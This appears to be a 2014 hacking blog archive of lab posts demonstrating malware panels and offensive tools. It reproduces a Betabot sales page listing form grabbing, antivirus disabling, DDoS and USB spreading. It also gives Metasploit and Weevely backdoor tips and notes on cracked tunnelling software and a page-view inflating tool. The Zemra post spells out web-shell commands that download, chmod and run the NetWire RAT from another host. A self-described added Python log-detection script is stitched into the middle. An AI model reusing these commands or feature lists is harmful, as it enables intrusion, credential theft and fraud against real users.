Sunday, June 1, 2014

Saturday, May 10, 2014

Inside Betabot Panel Version 1.7.0.1

Betabot is a publicly sold bot. It is priced competitively at $500.00 in BTC/LTC/Perfect Money as of 5-10-2014. The 1.7.0.1 panel requires ionCube Loader 5.4, and the bot does not come with a builder, just a binary file that can be locked to up to 16 domains. Betabot has a formgrabber for Internet Explorer, Firefox and Chrome, but unlike most banking bots Betabot does not have web-injects. Betabot can, however, force Internet Explorer to be the default browser, which could give cracked legacy banking bots such as Zeus, SpyEye, ICE IX, Citadel and Carberp a new prolonged life. Also note that plugins are planned for the future and will cost additional money.
I have made the following video on my YouTube channel showing the 1.7.0.1 panel.
Video: http://youtu.be/fSPaiTlt_UA



Sales Page

Core Features

  • Form Grabber
    When specified sites are detected, Betabot will pull any relevant forms as they are sent, and export details to the main panel. In order for the Form Grabber to work, you must specify filters on the panel. When creating filters, the use of wildcards (*) is supported.
    • Firefox (Normal and SSL and SPDY)
    • Internet Explorer (Normal and SSL)
    • Google Chrome (Normal and SSL)
  • x86/64 Userkit
    Userland rootkit for both 32 bit and 64 bit systems allows the bot to remain untouchable to other bots and basic user interference. Innovative technique for intercepting system calls on x86 systems allows for better compatibility with other bots. All hooks made will be restored if removed and general unhooker removes 3rd party hooks on sensitive NT service stubs.
  • AntiVirus Disabler
    Using multiple removal methods, Betabot is able to remove or disable over 30 different antivirus products from user mode. On Vista and 7, elevation is required for this function to work properly. To help achieve maximum efficiency, a custom social engineering tactic (written in 12 languages) is used to trick the user into elevating the bot process. This method has proven to be roughly 70% - 80% effective when attempting to elevate privileges.

  • Anti-Malware (Botkiller)
    Complex heuristic-based anti-malware component allows for thorough removal of major/common malware used in PPI ventures and more. Suspicious autostart items, files, processes and injected code will be removed/disabled when possible. Special options to target BTC/LTC miners are available.
  • DNS Blocker/Redirector
    The domain name modifier allows domains to be forced to resolve to any IP provided, or flat out blocked. All popular browsers/desktop applications supported.
  • Live FTP/POP3 grabber
    Network data interception allows FTP and POP3 logins over non-SSL connections to be intercepted and recorded in real time. Additionally, SSH logins made from PuTTY client are recorded and reported to the server.
  • File Search
    Ability to search all files on local hard disks for certain terms or files with certain names/extensions. Additionally, directories can be excluded from the search. Files matching search parameters will be uploaded to the C2 server.
  • Proactive Defense Mode
    Special self-defense mode that can be toggled on and off. When turned on, this will block most known methods of code injection and other malware-related activity to ensure only Betabot is in control.
  • General bot defense
    Using a myriad of different concepts, Betabot protects itself from removal/tampering. Areas of protection include process, autostart and file protection. Betabot is highly resistant to code injection, file removal and unhooking.
  • Additional features:
    • File Size < 150kb
    • Config Editor to edit builds -- Change group names
    • Block Bootkit Installation of some Bootkits (Mainly Rovnix(Carberp)). Can be toggled on/off from the panel.
    • Multi Server Support for up to 16 different servers. Different configurations are possible for each individual server.
    • Four different DDoS methods. Various settings to change. Uses local information to attempt to randomize headers in HTTP Floods.
      • UDP
      • Rapid Connect/Disconnect
      • HTTP GET
      • Slowloris

    • Experimental Ruskill - Using an active sandbox-like mechanism, Betabot will attempt to sequester specified programs and roll back any changes made by them after running. This feature is currently in development and may not work on some bots.
    • USB Autorun - When enabled, Betabot will add itself to any USB drive inserted into the machine using LNK-File swap techniques.
    • SOCKS4 Server - Turn your bots into dedicated SOCKS4 proxies. You may set the port as well as the duration. Supports UPnP.
    • FTP Stealer harvests live FTP logins as they happen in real time.
    • Anti Virus Checker allows you to enter your Scan4You account info into the panel and makes use of the S4Y API for quick and easy scanning, straight from your own panel.
    • Various Rudimentary Antis - To help maintain the integrity of Beta Bot and to protect various pieces of vital code, Beta Bot makes use of multiple anti-debugging and anti-dumping methods.
    • Download / Update / Uninstall / etc - Basic commands expected of all bots. Supports DLLs and JAR files.
    • Execute system shell commands
    • Additional User Accounts - Ability to create additional user accounts to access your panel. Fully customizable access levels.
    • Advanced Search Options to locate specific bots quickly and easily.

Monday, February 17, 2014

Ubuntu 12.04 LTS meterpreter shell

Just wanted to show how to use msfpayload to generate a Linux meterpreter bind shell as an exe binary file. This requires the victim/user to run and execute the malicious exe file. Tested on Ubuntu 12.04 LTS.
Video: http://youtu.be/FpPE3C4Q1TU

Saturday, February 15, 2014

Windows metasploit shell upgrade to a meterpreter shell Metasploit tip

I wanted to show how to upgrade a standard Metasploit Windows shell to a meterpreter shell.
Once you have a Metasploit Windows shell, simply type sessions -l to list all sessions. Find the number of the session you wish to upgrade and type sessions -u followed by the session number.
Video: http://youtu.be/UdFwRGdoAsU

Wednesday, February 5, 2014

Weevely PHP Backdoor

Weevely is a great tool found in Kali. Weevely creates a password-protected PHP backdoor. I wanted to show the basics of using Weevely in my video.
Weevely video link: http://youtu.be/tKUynA5Is1Y

Tuesday, February 4, 2014

Generating a metasploit php meterpreter bind shell

I wanted to cover how to generate a Metasploit PHP meterpreter bind shell. You have to visit the URL where you uploaded your bind meterpreter shell to activate it. You don't have to specify a path to the shell; just the remote host's IP is required. Anyone with Metasploit can use that bind shell. It's best to use a reverse shell if you're going to use a PHP meterpreter shell. I will cover a more secure shell, Weevely, that requires a password.
Video link: http://youtu.be/lo_LrMaNcS8

Wednesday, January 29, 2014

Zemra web panel hack with NetWIRE

Found an exploit for Zemra and used NetWire to hack the Zemra web panel.

Commands:

wget downloads testlinux.out (the NetWire RAT) to the current directory, http://192.168.56.141/zemra/system/
http://192.168.56.141/zemra/system/command.php?cmd=wget http://192.168.56.207/testlinux.out

chmod 777 makes it possible to execute testlinux.out (the NetWire RAT)
http://192.168.56.141/zemra/system/command.php?cmd=chmod 777 testlinux.out

./testlinux.out simply executes the NetWire RAT
http://192.168.56.141/zemra/system/command.php?cmd=./testlinux.out

NetWire RAT: http://www.worldwiredlabs.com/netwire
Exploit: http://www.1337day.com/exploit/21663
My video: http://youtu.be/w3Eo7HI8Bbk
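From the defender's side, the three requests above leave a very recognisable trail in the web server's access log: a panel script being handed wget, then chmod 777, then ./file through a cmd= parameter. The script below is an added detection example (not from the post, Zemra or NetWire) that parses constructed Apache-style log lines, flags every command passed to command.php, and reports source IPs that complete the full fetch/chmod/execute chain; the log lines, IPs and timestamps are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache-style access log lines (sample data for this example, not a real capture);
# the paths and commands mirror the ones in the post above.
SAMPLE_LOG = """\
192.168.56.207 - - [29/Jan/2014:10:01:02 -0500] "GET /zemra/system/command.php?cmd=wget%20http://192.168.56.207/testlinux.out HTTP/1.1" 200 17
192.168.56.207 - - [29/Jan/2014:10:01:09 -0500] "GET /zemra/system/command.php?cmd=chmod%20777%20testlinux.out HTTP/1.1" 200 0
192.168.56.207 - - [29/Jan/2014:10:01:15 -0500] "GET /zemra/system/command.php?cmd=./testlinux.out HTTP/1.1" 200 0
192.168.56.10 - - [29/Jan/2014:10:02:30 -0500] "GET /zemra/index.php HTTP/1.1" 200 5120
192.168.56.10 - - [29/Jan/2014:10:03:00 -0500] "GET /zemra/system/command.php?cmd=ls HTTP/1.1" 200 90
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Stages of the download-and-execute chain the post walks through (wget, chmod 777, ./file).
STAGES = {
    "fetch": re.compile(r"\b(wget|curl)\b"),
    "chmod": re.compile(r"\bchmod\s+[0-7]*7[0-7]*\b"),  # makes the dropped file executable
    "exec": re.compile(r"(^|[;&|]\s*)\./"),             # runs a file out of the web root
}

def parse_line(line):
    """Split one access log line into fields; the query string is percent-decoded."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return {"ip": m.group("ip"), "ts": m.group("ts"), "status": m.group("status"),
            "path": parts.path, "query": parse_qs(parts.query)}

def find_command_injection(log_text):
    """Alert on every request that hands a shell command to command.php via cmd=."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or not rec["path"].endswith("/command.php"):
            continue
        for cmd in rec["query"].get("cmd", []):
            stage = next((n for n, rx in STAGES.items() if rx.search(cmd)), None)
            alerts.append({"ip": rec["ip"], "ts": rec["ts"], "cmd": cmd, "stage": stage,
                           "severity": "high" if stage else "medium"})
    return alerts

def download_exec_chains(alerts):
    """Source IPs that completed all three stages: fetch, chmod, execute."""
    seen = {}
    for a in (a for a in alerts if a["stage"]):
        seen.setdefault(a["ip"], set()).add(a["stage"])
    return sorted(ip for ip, st in seen.items() if st == set(STAGES))
```

Any hit on command.php with a cmd= parameter is worth an alert on its own; the chain check just ranks the source that actually dropped and started a binary above a host that only ran ls.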

Monday, January 27, 2014

HTTP Traffic 1.2 traffic generator

I downloaded HTTP Traffic 1.2, a jQuery script that you can run in your local browser, and tested it on my test blog testtraffic185.blogspot.com. I started out with 1 page view; after running the tool I had 49 page views in Google stats.
Video link: http://youtu.be/RdK3wCbghSk

Sunday, January 26, 2014

Sandboxie and meterpreter

Windows XP SP3 support ends April 8th, 2014. This is not good for people who are forced to use Windows XP at work. I decided to make a video showing an old exploit, CVE-2010-2568. The exploit worked and delivered a Metasploit reverse meterpreter TCP payload. The payload executed in the sandbox; as soon as I terminated the programs in the sandbox, the meterpreter session died. In the meterpreter session I tried getprivs and getsystem, but they were blocked by Sandboxie. Sandboxie also prevented me from migrating the process. But I was able to download and upload files in the meterpreter session and get a shell, so Sandboxie only minimizes the damage. Without Sandboxie everything worked as you would expect. Anyway, this solution is only for those who are forced to use outdated software.

CVE-2010-2568 exploit: http://www.exploit-db.com/exploits/14403/
You can get Sandboxie at http://www.sandboxie.com/index.php?DownloadSandboxie
Anyway, this is my video: http://youtu.be/3QVDIkXeRrc

Sunday, January 19, 2014

HVNC (hidden vnc bot)

Tested this bot in a local network in VMware. The bot can have a hidden VNC session which is invisible to the user, or a visible session like Metasploit. This is probably a rip-off of the leaked Zeus source code, but there are new features such as capturing video from a webcam and password protection on VNC bot sessions, unlike Zeus.
Check out the video at http://youtu.be/s3BGsata6Ow

Thursday, January 9, 2014

Cracked VPSProxy Gold 2.5.0


I decided to show Cracked VPSProxy Gold 2.5.0 to give people an idea of how blackhats can tunnel their HTTP and HTTPS traffic through a PHP backdoor or a chain of backdoors. They can even use a proxy before they connect to the PHP backdoors. I tested using Windows XP SP3 with cracked VPSProxy Gold 2.5.0 and used Kali as the server hosting the backdoor test.php.
Check the video out: http://youtu.be/5a_IW7amGSQ

Sunday, January 5, 2014

Zeus 2.7.6.8 Panel MMBB

The simplest way to test MMBB is to install WAMP (http://www.wampserver.com/en/) on a Windows XP or higher VM.

The panel requires ionCube:
http://downloads3.ioncube.com/loader_...

The bot only works on localhost! Attention skids, take note: skip this bot unless you can get it working with Tor yourself.

Only using localhost makes sense if you want to use something like Torifier (http://ratnetw0rk.blogspot.com/p/setu...), as in this video: http://youtu.be/71pZd26Ogww

The bot version is Zeus 2.9.6.1.
MMBB injects on IE 8 and Firefox 26 on Windows XP SP3.

VNC back connect works; tested the bk.exe server on Windows 8.1.

Zeus 2.7.6.8 MMBB Control Panel video